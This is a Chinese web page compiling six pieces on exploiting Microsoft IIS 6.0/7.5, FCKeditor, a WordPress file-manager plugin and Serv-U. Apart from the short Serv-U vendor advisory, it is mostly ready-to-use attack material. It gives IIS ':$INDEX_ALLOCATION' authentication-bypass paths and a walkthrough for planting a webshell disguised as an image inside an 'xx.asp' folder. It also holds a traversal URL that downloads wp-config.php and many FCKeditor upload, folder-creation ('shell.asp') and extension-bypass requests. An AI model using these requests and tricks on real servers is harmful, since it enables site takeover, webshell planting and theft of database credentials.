微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警

时间:2022-08-31 07:44:07 其他范文 收藏本文 下载本文

微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警(精选6篇)由网友“番茄泡泡鱼”投稿提供,以下是小编帮大家整理后的微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警,仅供参考,希望能够帮助到大家。

微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警

篇1:微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警

微软的IIS 6.0安装PHP绕过认证漏洞

微软IIS与PHP 6.0(这是对PHP5中的Windows Server SP1的测试)详细说明:

攻击者可以发送一个特殊的请求发送到IIS 6.0服务,成功绕过访问限制

攻击者可以访问有密码保护的文件

例:–>

Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php

1 Example request (path to the file): /admin::$INDEX_ALLOCATION/index.php

(暂时没有翻译,怕影响精确度)

if the:$INDEX_ALLOCATION postfix is appended to directory name.

This can result in accessing administrative files and under special circumstances execute arbirary code remotely

微软IIS 7.5经典的ASP验证绕过

受影响的软件:.NET Framework 4.0(.NET框架2.0是不受影响,其他.NET框架尚未进行测试)(在Windows 7测试)

详细说明:

通过添加 [ “:$i30:$INDEX_ALLOCATION” ] to the directory serving (便可成功绕过)

例:

There is a password protected directory configured that has administrative asp scripts inside An attacker requests the directory with :$i30:$INDEX_ALLOCATION appended to the directory name IIS/7.5 gracefully executes the ASP script. without asking for proper credentials

IIS 7.5 NET源代码泄露和身份验证漏洞

(.NET 2.0和.NET 4.0中测试)

例:–>

/admin:$i30:$INDEX_ALLOCATION/admin.php

1 /admin:$i30:$INDEX_ALLOCATION/admin.php

will run the PHP script. without asking for proper credentials.(暂时没有翻译)

By appending /.php to an ASPX file (or any other file using the .NET framework that is not blocked through the request filtering rules,like misconfigured: .CS,.VB files) IIS/7.5 responds with the full source code of the file and executes it as PHP code. This means that by using an upload feature it might be possible (under special circumstances) to execute arbitrary PHP code. Example: Default.aspx/.php

篇2:浅析iis6.0设计缺陷漏洞预警

作者:冰的原点[0.s.t]&[L.S.T]

说明:文章已发表于 手册0805期,请注明!

应该是好久以前吧,呵呵,大家应该还记得动易那个没有过滤.和asp的漏子吧.在2003系统的iis6.0的配合下,我们小黑们很容易在如xx.asp的文件夹下上传一个xx.jpg的木马文件,这样我们就可以得到web木马了.今天我们谈到的问题就是这个设计缺陷.

一:无法访问大马的疑问及解决办法.

本来也想往原理性的方面探讨下,可用google和百度怎么也搜索不出我想要的结果,而且网上找到的也只说了个方法:让我们建一个xx.asp的文件夹,然后在其文件夹里面上传一个木马,把木马改成jpg或者gif后就可以得到我们的后门马了,可今天我试了一下的时候却出现了一些让人疑惑的问题.还是用实验来说明下情况吧.我的虚拟机是2003的,装有iis6.0并充许asp及aspx脚本文件执行.那么我们一步步来实验下,首现我的的IIS目录下建一个1.asp的文件夹,里面放了一个大马,文件名已经改成dama.jpg,如图1.

接着我们来到本机上访问下,如图2,成功访问了.然后我们访问下试,如图3.直接转向了1.asp文件夹下了,这是怎么回事呢?这个是本文要解决的问题之一.问题很奇怪,按理说,都能访问了,应该可以正常登陆及使用呀.到网上搜索了下,没有发现有这样类似的问题出现,于是和群里讨论了下,小组成员小浪给了我很大的启发:他认为既然都可以解析web木马了,那出现不能登陆的问题应该出现木马的身上,从刚才的图片可以看得出,木马接收到的参数发生了变化,也就是自动转向了1.asp文件夹里,这是为什么呢?我们来看看木马的参数是怎么接收的呢?我从一个大马里找出了以下几行代码:

URL=Request.ServerVariables(“URL”)

ServerIP=Request.ServerVariables(“LOCAL_ADDR”)

Action=Request(“Action”)

最关键的是第一句,接收到的参数是通过url来传递的,也就是说当我们登陆的时候,服务器会解析1.asp(这里我也表达的不太清楚),所以无法验证的情况便出现了.因此为了解决这个问题,我们只需要把第一句换成:

URL=Request.ServerVariables(“PATH_INFO”)

这样,我们就可以顺利的用大马访问了,如图4.

这里我们就不得不提下path_info这个变量了它的功能就是呈现虚拟路径了,也就是可以顺利解析到dama.jpg下.不过从网上得到答案是,直接先访问小马就不会出现这个问题,如图5.这是因为小马的功能简单,不涉及到复杂的路径解析,不过我等小菜应该本着学习的精神把更多的原理弄懂才是最要紧的.

二:对其它脚本文件解析的思考.

小菜贵在学习和举一反三,可能我说的这个问题大牛们早就知道了,不过自己想出来的以及证明才是最重要的!不多说了,当时我就想既然能解析xx.asp文件夹下的文件,那xx.aspx,xx.php等是不是会解析相应的脚本文件,我的虚拟机可以解析aspx的马,我们来试试,我这里就直接在IIS目录下新建了个文件,然后访问我的aspx文件,如图6.

开始以为和asp大马一样要改下什么东西,可当我把一个平常的aspx文件放上去的时候,也不能.(不过,后来证实确实不能解析xx.aspx下的,因为连正常木马的aspx页面都没出来).那么xx.php呢?虽然我的虚拟机上没有装php的环境,但如果能解析的话,当我访问的时候,要么就全部把php源码直接显示出来,要么直接显示下载,大家看图,证明我的猜想是正确的,如图7.猜想始终是猜想,为了确保想法的正确性,又叫小浪同学测试了下,确实能够把xx.php文件夹下的文件解析成php文件(不过,他是用正常的PHP文件测试的,没有用PHP马来测试).

小结下:这篇文章主要是想弄清其它的原理以及对其它脚本是否也支持这种形式的解析做的探讨,当然因为条件有限,我也没有继续测试cfm,cgi以及jsp等其它脚本文件了.同时也希望大家多关注下原理性的东西,毕竟了解原理才是最重要的.

篇3:WordPresswpFileManagerFileDownload漏洞利用方法漏洞预警

漏洞详解:packetstormsecurity.com/files/121637/WordPress-wp-FileManager-File-Download.html

查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL,

WordPresswpFileManagerFileDownload漏洞利用方法漏洞预警

篇4:fckeditor漏洞利用漏洞预警

fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp

可以自定义文件夹名称上传图片木马,利用路径解析漏洞,也可以直接上传ASP木马,

fckeditor漏洞利用漏洞预警

如果是ASPX的就将/asp/connector.asp后缀改为ASPX

Type=Image这个变量是我们自己定义的。比如:

fckeditor/editor/filemanager/browser/default/browser.html?Type=xiaosei&Connector=connectors/asp/connector.asp

篇5:ServU多个安全漏洞漏洞预警

受影响系统:

serv-u serv-u 15.x

描述:

--------------------------------------------------------------------------------

Serv-U是一种使用广泛的FTP服务器程序,

Serv-U 15.1.0.458之前版本没有验证用户名称时会返回不同的响应,这可导致枚举有效的用户名称,某些用户输入没有正确过滤即返回给用户,这可导致在用户浏览器会话中执行任意HTML和脚本代码,

<*来源:vendor

链接:secunia.com/advisories/58991/

*>

建议:

--------------------------------------------------------------------------------

厂商补丁:

serv-u

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

www.serv-u.com/releasenotes/

篇6:FCKeditor漏洞利用总结漏洞预警

Fckeditor漏洞利用总结

查看编辑器版本

FCKeditor/_whatsnew.html

—————————————————————————————————————————————————————————————

2. Version 2.2 版本

Apache+linux 环境下在上传文件后面加个.突破!测试通过,

—————————————————————————————————————————————————————————————

3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。

action=“www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media” method=“post”>Upload a new file:

—————————————————————————————————————————————————————————————

4.FCKeditor 文件上传“.”变“_”下划线的绕过方法

很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。

4.1:提交shell.php+空格绕过

不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。

4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。

—————————————————————————————————————————————————————————————

5. 突破建立文件夹

FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp

—————————————————————————————————————————————————————————————

6. FCKeditor 中test 文件的上传地址

FCKeditor/editor/filemanager/browser/default/connectors/test.html

FCKeditor/editor/filemanager/upload/test.html

FCKeditor/editor/filemanager/connectors/test.html

FCKeditor/editor/filemanager/connectors/uploadtest.html

—————————————————————————————————————————————————————————————

7.常用上传地址

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)

JSP 版:

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp

注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文

件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址,

—————————————————————————————————————————————————————————————

8.其他上传地址

FCKeditor/_samples/default.html

FCKeditor/_samples/asp/sample01.asp

FCKeditor/_samples/asp/sample02.asp

FCKeditor/_samples/asp/sample03.asp

FCKeditor/_samples/asp/sample04.asp

一般很多站点都已删除_samples 目录,可以试试。

FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。

—————————————————————————————————————————————————————————————

9.列目录漏洞也可助找上传地址

Version 2.4.1 测试通过

修改CurrentFolder 参数使用 ../../来进入不同的目录

/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp

根据返回的XML 信息可以查看网站所有的目录。

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F

也可以直接浏览盘符:

JSP 版本:

FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F

—————————————————————————————————————————————————————————————

10.爆路径漏洞

FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp

—————————————————————————————————————————————————————————————

11. FCKeditor 被动限制策略所导致的过滤不严问题

影响版本: FCKeditor x.x <= FCKeditor v2.4.3

脆弱描述:

FCKeditor v2.4.3 中File 类别默认拒绝上传类型:

html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm

Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!

而在apache 下,因为“Apache 文件名解析缺陷漏洞”也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。

在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!

Windows 服务器的安全防护林

心海学校心理管理系统Xday漏洞预警

关于Fckeditor2次上传漏洞(IIS6分号解析漏洞)

Windows 中IIS php5isapi.dll加载失败Windows服务器操作系统

网络层安全服务与攻击分析

LNK文件漏洞简要分析

win/win7 iis7与IIS6对无法上传大文件的解决方法linux网页制作

FCKeditor 建立文件夹、上传文件时“.”变“”的突破漏洞预警

nginx配置中文域名WEB服务器

FTP常用软件servu的安全权限处理WEB安全

微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警
《微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【微软IIS 6.0和7.5的多个漏洞及利用方法漏洞预警(精选6篇)】相关文章:

冰箱密封条的检查和修复方法2024-03-24

服务器故障排错的基本原则2022-05-02

齐博CMS验证码美化教程2022-05-06

隔离网络高级威胁攻击预警的分析报告2023-05-29

网上订餐系统点评:都来订网络外卖订餐系统2022-08-08

PHPzendstrtod函数浮点值拒绝服务漏洞及修复2023-01-14

微软修补PowerPoint漏洞2022-05-07

软件测试转正述职报告2022-05-08

ideacms文章管理系统漏洞及修复2022-12-21

网站渗透思路全方面总结2023-01-18

点击下载本文文档